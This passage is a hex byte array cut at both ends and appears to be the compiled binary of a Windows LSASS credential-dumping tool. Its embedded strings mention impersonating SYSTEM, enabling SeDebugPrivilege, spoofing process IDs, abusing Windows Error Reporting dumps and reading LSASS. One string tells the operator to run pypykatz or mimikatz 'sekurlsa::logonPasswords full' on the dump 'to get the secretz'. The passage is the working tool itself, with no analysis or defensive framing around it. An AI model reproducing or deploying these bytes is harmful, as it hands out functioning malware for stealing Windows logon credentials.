,0x74,0x1E,0x83,0xEB,0x04,0x39,0xF3,0x72,0x0F,0x8B,0x03,0x85,0xC0,0x74,0xF3,0xFF,0xD0,0x83,0xEB,0x04,0x39,0xF3,0x73,0xF1,0x89,0x34,0x24,0xE8,0x51,0x00,0x00,0x00,0x83,0xC4,0x1C,0x31,0xC0,0x5B,0x5E,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0x25,0x80,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0x84,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0x88,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0x90,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0x94,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0x98,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xA0,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xA4,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xA8,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xAC,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xB0,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xB4,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xB8,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xBC,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xC0,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xC4,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xC8,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xCC,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xD0,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xD4,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xD8,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xDC,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xE0,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xE4,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xEC,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xF0,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xF4,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xF8,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0xFC,0x61,0x49,0x65,0x90,0x90,0xFF,0x25,0x00,0x62,0x49,0x65,0x90,0x90,0xFF,0x25,0x04,0x62,0x49,0x65,0x90,0x90,0x66,0x90,0x66,0x90,0x66,0x90,0x66,0x90,0x55,0x89,0xE5,0x57,0x56,0x53,0x83,0xEC,0x2C,0x8B,0x5D,0x0C,0x8B,0x55,0x08,0x8B,0x75,0x10,0x8B,0x7D,0x14,0x85,0xDB,0x75,0x17,0x89,0x7D,0x0C,0x89,0x75,0x08,0x83,0xC4,0x2C,0x5B,0x5E,0x5F,0x5D,0xE9,0xC5,0xFB,0xFF,0xFF,0x2E,0x8D,0x74,0x26,0x00,0x89,0x14,0x24,0x89,0x7C,0x24,0x0C,0x89,0x74,0x24,0x08,0x89,0x5C,0x24,0x04,0x89,0x55,0xE4,0xE8,0xE1,0xFE,0xFF,0xFF,0x8B,0x55,0xE4,0x85,0xC0,0x78,0x12,0x39,0xC3,0x74,0x0E,0x83,0xC4,0x2C,0x5B,0x5E,0x5F,0x5D,0xC3,0x8D,0xB6,0x00,0x00,0x00,0x00,0xC6,0x44,0x1A,0xFF,0x00,0x85,0xC0,0x78,0xB0,0x83,0xC4,0x2C,0x5B,0x5E,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xE9,0xAB,0x46,0xFF,0xFF,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xFF,0xFF,0xFF,0xFF,0x50,0xCD,0x48,0x65,0x00,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE4,0xE9,0x48,0x65,0xFA,0xE9,0x48,0x65,0x10,0xEA,0x48,0x65,0x24,0xEA,0x48,0x65,0x3C,0xEA,0x48,0x65,0x56,0xEA,0x48,0x65,0x6E,0xEA,0x48,0x65,0x88,0xEA,0x48,0x65,0x9E,0xEA,0x48,0x65,0xB8,0xEA,0x48,0x65,0xCC,0xEA,0x48,0x65,0xE2,0xEA,0x48,0x65,0xF8,0xEA,0x48,0x65,0x0E,0xEB,0x48,0x65,0x2C,0xEB,0x48,0x65,0x46,0xEB,0x48,0x65,0x5E,0xEB,0x48,0x65,0x76,0xEB,0x48,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0xCD,0x48,0x65,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x02,0x00,0x00,0x00,0x60,0xC8,0x48,0x65,0x40,0xC9,0x48,0x65,0x40,0xCA,0x48,0x65,0x60,0xCB,0x48,0x65,0x90,0xCA,0x48,0x65,0x60,0xCA,0x48,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x6C,0x69,0x62,0x67,0x63,0x63,0x5F,0x73,0x5F,0x64,0x77,0x32,0x2D,0x31,0x2E,0x64,0x6C,0x6C,0x00,0x5F,0x5F,0x72,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x5F,0x66,0x72,0x61,0x6D,0x65,0x5F,0x69,0x6E,0x66,0x6F,0x00,0x5F,0x5F,0x64,0x65,0x72,0x65,0x67,0x69,0x73,0x74,0x65,0x72,0x5F,0x66,0x72,0x61,0x6D,0x65,0x5F,0x69,0x6E,0x66,0x6F,0x00,0x00,0x00,0x00,0xFF,0x15,0x8C,0x38,0x1E,0x10,0x85,0x00,0x78,0x78,0x3F,0x3F,0x3F,0x3F,0x78,0x00,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x49,0x64,0x54,0x6F,0x53,0x65,0x73,0x73,0x69,0x6F,0x6E,0x49,0x64,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x42,0x00,0x61,0x00,0x73,0x00,0x65,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0xFF,0x15,0x38,0x20,0x88,0x6B,0xFF,0x00,0x42,0x61,0x73,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x6E,0x69,0x74,0x54,0x68,0x75,0x6E,0x6B,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0xFF,0x15,0xE0,0x91,0x3A,0x4B,0xFF,0x00,0x52,0x74,0x6C,0x55,0x73,0x65,0x72,0x54,0x68,0x72,0x65,0x61,0x64,0x53,0x74,0x61,0x72,0x74,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x2E,0x74,0x65,0x78,0x74,0x00,0x74,0x6F,0x6F,0x20,0x6D,0x61,0x6E,0x79,0x20,0x66,0x72,0x61,0x6D,0x65,0x73,0x21,0x00,0x0A,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5C,0x00,0x52,0x00,0x65,0x00,0x67,0x00,0x69,0x00,0x73,0x00,0x74,0x00,0x72,0x00,0x79,0x00,0x5C,0x00,0x4D,0x00,0x61,0x00,0x63,0x00,0x68,0x00,0x69,0x00,0x6E,0x00,0x65,0x00,0x5C,0x00,0x53,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x77,0x00,0x61,0x00,0x72,0x00,0x65,0x00,0x5C,0x00,0x4D,0x00,0x69,0x00,0x63,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x6F,0x00,0x66,0x00,0x74,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x20,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x20,0x00,0x52,0x00,0x65,0x00,0x70,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x69,0x00,0x6E,0x00,0x67,0x00,0x5C,0x00,0x4C,0x00,0x6F,0x00,0x63,0x00,0x61,0x00,0x6C,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x73,0x00,0x5C,0x00,0x00,0x00,0x44,0x00,0x75,0x00,0x6D,0x00,0x70,0x00,0x54,0x00,0x79,0x00,0x70,0x00,0x65,0x00,0x00,0x00,0x5C,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x4F,0x00,0x62,0x00,0x6A,0x00,0x65,0x00,0x63,0x00,0x74,0x00,0x73,0x00,0x5C,0x00,0x53,0x00,0x79,0x00,0x73,0x00,0x74,0x00,0x65,0x00,0x6D,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x50,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x52,0x00,0x65,0x00,0x61,0x00,0x64,0x00,0x79,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5C,0x00,0x57,0x00,0x69,0x00,0x6E,0x00,0x64,0x00,0x6F,0x00,0x77,0x00,0x73,0x00,0x45,0x00,0x72,0x00,0x72,0x00,0x6F,0x00,0x72,0x00,0x52,0x00,0x65,0x00,0x70,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x69,0x00,0x6E,0x00,0x67,0x00,0x53,0x00,0x65,0x00,0x72,0x00,0x76,0x00,0x69,0x00,0x63,0x00,0x65,0x00,0x50,0x00,0x6F,0x00,0x72,0x00,0x74,0x00,0x00,0x00,0x74,0x68,0x65,0x20,0x57,0x65,0x72,0x20,0x73,0x65,0x72,0x76,0x69,0x63,0x65,0x20,0x72,0x65,0x73,0x70,0x6F,0x6E,0x64,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x61,0x6E,0x20,0x65,0x72,0x72,0x6F,0x72,0x00,0x0A,0x00,0x00,0x00,0x46,0x61,0x69,0x6C,0x65,0x64,0x20,0x74,0x6F,0x20,0x6F,0x70,0x65,0x6E,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x74,0x6F,0x20,0x73,0x70,0x6F,0x6F,0x66,0x65,0x64,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x69,0x64,0x20,0x25,0x6C,0x64,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x5C,0x00,0x4B,0x00,0x6E,0x00,0x6F,0x00,0x77,0x00,0x6E,0x00,0x44,0x00,0x6C,0x00,0x6C,0x00,0x73,0x00,0x5C,0x00,0x00,0x00,0x00,0x00,0x4C,0x00,0x6F,0x00,0x63,0x00,0x61,0x00,0x6C,0x00,0x41,0x00,0x70,0x00,0x70,0x00,0x44,0x00,0x61,0x00,0x74,0x00,0x61,0x00,0x00,0x00,0x00,0x00,0x44,0x6F,0x6E,0x65,0x2C,0x20,0x72,0x75,0x6E,0x3A,0x20,0x64,0x69,0x72,0x20,0x25,0x6C,0x73,0x5C,0x43,0x72,0x61,0x73,0x68,0x44,0x75,0x6D,0x70,0x73,0x5C,0x00,0x0A,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x27,0x25,0x73,0x27,0x20,0x77,0x61,0x73,0x20,0x6E,0x6F,0x74,0x20,0x66,0x6F,0x75,0x6E,0x64,0x00,0x00,0x5C,0x00,0x3F,0x00,0x3F,0x00,0x5C,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x70,0x61,0x74,0x68,0x20,0x27,0x25,0x6C,0x73,0x27,0x20,0x69,0x73,0x20,0x69,0x6E,0x76,0x61,0x6C,0x69,0x64,0x2E,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x77,0x72,0x69,0x74,0x65,0x20,0x74,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x25,0x6C,0x73,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x6D,0x69,0x6E,0x69,0x64,0x75,0x6D,0x70,0x20,0x68,0x61,0x73,0x20,0x61,0x6E,0x20,0x69,0x6E,0x76,0x61,0x6C,0x69,0x64,0x20,0x73,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x2C,0x20,0x72,0x65,0x73,0x74,0x6F,0x72,0x65,0x20,0x69,0x74,0x20,0x72,0x75,0x6E,0x6E,0x69,0x6E,0x67,0x3A,0x0A,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2F,0x72,0x65,0x73,0x74,0x6F,0x72,0x65,0x5F,0x73,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x20,0x25,0x73,0x00,0x44,0x6F,0x6E,0x65,0x2C,0x20,0x74,0x6F,0x20,0x67,0x65,0x74,0x20,0x74,0x68,0x65,0x20,0x73,0x65,0x63,0x72,0x65,0x74,0x7A,0x20,0x72,0x75,0x6E,0x3A,0x0A,0x70,0x79,0x74,0x68,0x6F,0x6E,0x33,0x20,0x2D,0x6D,0x20,0x70,0x79,0x70,0x79,0x6B,0x61,0x74,0x7A,0x20,0x6C,0x73,0x61,0x20,0x6D,0x69,0x6E,0x69,0x64,0x75,0x6D,0x70,0x20,0x25,0x73,0x0A,0x6D,0x69,0x6D,0x69,0x6B,0x61,0x74,0x7A,0x2E,0x65,0x78,0x65,0x20,0x22,0x73,0x65,0x6B,0x75,0x72,0x6C,0x73,0x61,0x3A,0x3A,0x6D,0x69,0x6E,0x69,0x64,0x75,0x6D,0x70,0x20,0x25,0x73,0x22,0x20,0x22,0x73,0x65,0x6B,0x75,0x72,0x6C,0x73,0x61,0x3A,0x3A,0x6C,0x6F,0x67,0x6F,0x6E,0x50,0x61,0x73,0x73,0x77,0x6F,0x72,0x64,0x73,0x20,0x66,0x75,0x6C,0x6C,0x22,0x20,0x65,0x78,0x69,0x74,0x00,0x5C,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x73,0x00,0x2E,0x00,0x65,0x00,0x78,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x54,0x00,0x6F,0x00,0x6B,0x00,0x65,0x00,0x6E,0x00,0x00,0x00,0x54,0x6F,0x6F,0x20,0x6D,0x61,0x6E,0x79,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x73,0x2C,0x20,0x70,0x6C,0x65,0x61,0x73,0x65,0x20,0x69,0x6E,0x63,0x72,0x65,0x61,0x73,0x65,0x20,0x4D,0x41,0x58,0x5F,0x48,0x41,0x4E,0x44,0x4C,0x45,0x53,0x00,0x0A,0x00,0x50,0x00,0x72,0x00,0x6F,0x00,0x63,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x00,0x00,0x44,0x00,0x69,0x00,0x72,0x00,0x65,0x00,0x63,0x00,0x74,0x00,0x6F,0x00,0x72,0x00,0x79,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x6F,0x70,0x65,0x6E,0x20,0x61,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x77,0x69,0x74,0x68,0x20,0x74,0x68,0x65,0x20,0x72,0x65,0x71,0x75,0x65,0x73,0x74,0x65,0x64,0x20,0x70,0x65,0x72,0x6D,0x69,0x73,0x73,0x69,0x6F,0x6E,0x73,0x00,0x00,0x54,0x68,0x65,0x20,0x4C,0x53,0x41,0x53,0x53,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x77,0x61,0x73,0x20,0x6E,0x6F,0x74,0x20,0x66,0x6F,0x75,0x6E,0x64,0x2E,0x20,0x54,0x72,0x79,0x20,0x70,0x72,0x6F,0x76,0x69,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x50,0x49,0x44,0x20,0x77,0x69,0x74,0x68,0x20,0x2D,0x70,0x20,0x6F,0x72,0x20,0x2D,0x2D,0x70,0x69,0x64,0x00,0x54,0x68,0x65,0x72,0x65,0x20,0x69,0x73,0x20,0x6E,0x6F,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x77,0x69,0x74,0x68,0x20,0x74,0x68,0x65,0x20,0x50,0x49,0x44,0x20,0x25,0x6C,0x64,0x2E,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x6F,0x70,0x65,0x6E,0x20,0x61,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x74,0x6F,0x20,0x25,0x6C,0x64,0x2E,0x00,0x54,0x6F,0x6F,0x20,0x6D,0x61,0x6E,0x79,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x65,0x73,0x2C,0x20,0x70,0x6C,0x65,0x61,0x73,0x65,0x20,0x69,0x6E,0x63,0x72,0x65,0x61,0x73,0x65,0x20,0x4D,0x41,0x58,0x5F,0x50,0x52,0x4F,0x43,0x45,0x53,0x53,0x45,0x53,0x00,0x00,0x00,0x4E,0x6F,0x20,0x68,0x61,0x6E,0x64,0x6C,0x65,0x20,0x74,0x6F,0x20,0x74,0x68,0x65,0x20,0x4C,0x53,0x41,0x53,0x53,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x77,0x61,0x73,0x20,0x66,0x6F,0x75,0x6E,0x64,0x00,0x00,0x6E,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x62,0x00,0x75,0x00,0x67,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x49,0x00,0x6D,0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x6F,0x00,0x6E,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4E,0x6F,0x20,0x76,0x61,0x6C,0x69,0x64,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x74,0x6F,0x6B,0x65,0x6E,0x20,0x74,0x6F,0x20,0x69,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x20,0x77,0x61,0x73,0x20,0x66,0x6F,0x75,0x6E,0x64,0x2E,0x00,0x0A,0x00,0x00,0x53,0x00,0x65,0x00,0x41,0x00,0x73,0x00,0x73,0x00,0x69,0x00,0x67,0x00,0x6E,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x6D,0x00,0x61,0x00,0x72,0x00,0x79,0x00,0x54,0x00,0x6F,0x00,0x6B,0x00,0x65,0x00,0x6E,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x31,0x00,0x38,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x69,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x20,0x53,0x59,0x53,0x54,0x45,0x4D,0x00,0x00,0x53,0x00,0x2D,0x00,0x31,0x00,0x2D,0x00,0x35,0x00,0x2D,0x00,0x31,0x00,0x39,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x69,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x20,0x4C,0x4F,0x43,0x41,0x4C,0x20,0x53,0x45,0x52,0x56,0x49,0x43,0x45,0x00,0x5C,0x00,0x00,0x00,0x46,0x61,0x69,0x6C,0x65,0x64,0x20,0x74,0x6F,0x20,0x72,0x65,0x61,0x64,0x20,0x4C,0x53,0x41,0x53,0x53,0x2C,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3A,0x20,0x53,0x54,0x41,0x54,0x55,0x53,0x5F,0x41,0x43,0x43,0x45,0x53,0x53,0x5F,0x44,0x45,0x4E,0x49,0x45,0x44,0x00,0x0A,0x00,0x00,0x00,0x00,0x46,0x61,0x69,0x6C,0x65,0x64,0x20,0x74,0x6F,0x20,0x72,0x65,0x61,0x64,0x20,0x4C,0x53,0x41,0x53,0x53,0x2C,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3A,0x20,0x30,0x78,0x25,0x6C,0x78,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x73,0x65,0x6C,0x65,0x63,0x74,0x65,0x64,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x69,0x73,0x20,0x6E,0x6F,0x74,0x20,0x4C,0x53,0x41,0x53,0x53,0x2E,0x00,0x00,0x53,0x00,0x65,0x00,0x49,0x00,0x6D,0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x6F,0x00,0x6E,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x65,0x6E,0x61,0x62,0x6C,0x65,0x20,0x53,0x65,0x49,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x50,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x2E,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x65,0x6C,0x65,0x76,0x61,0x74,0x65,0x64,0x3F,0x00,0x0A,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x62,0x00,0x75,0x00,0x67,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x65,0x6E,0x61,0x62,0x6C,0x65,0x20,0x53,0x65,0x44,0x65,0x62,0x75,0x67,0x50,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x2E,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x65,0x6C,0x65,0x76,0x61,0x74,0x65,0x64,0x3F,0x00,0x00,0x00,0x00,0x41,0x20,0x70,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x20,0x69,0x73,0x20,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x3A,0x20,0x25,0x6C,0x73,0x2E,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x65,0x6C,0x65,0x76,0x61,0x74,0x65,0x64,0x3F,0x00,0x41,0x20,0x70,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x20,0x69,0x73,0x20,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x3A,0x20,0x25,0x6C,0x73,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x73,0x69,0x7A,0x65,0x20,0x65,0x78,0x63,0x65,0x65,0x64,0x73,0x20,0x74,0x68,0x65,0x20,0x33,0x32,0x2D,0x62,0x69,0x74,0x20,0x61,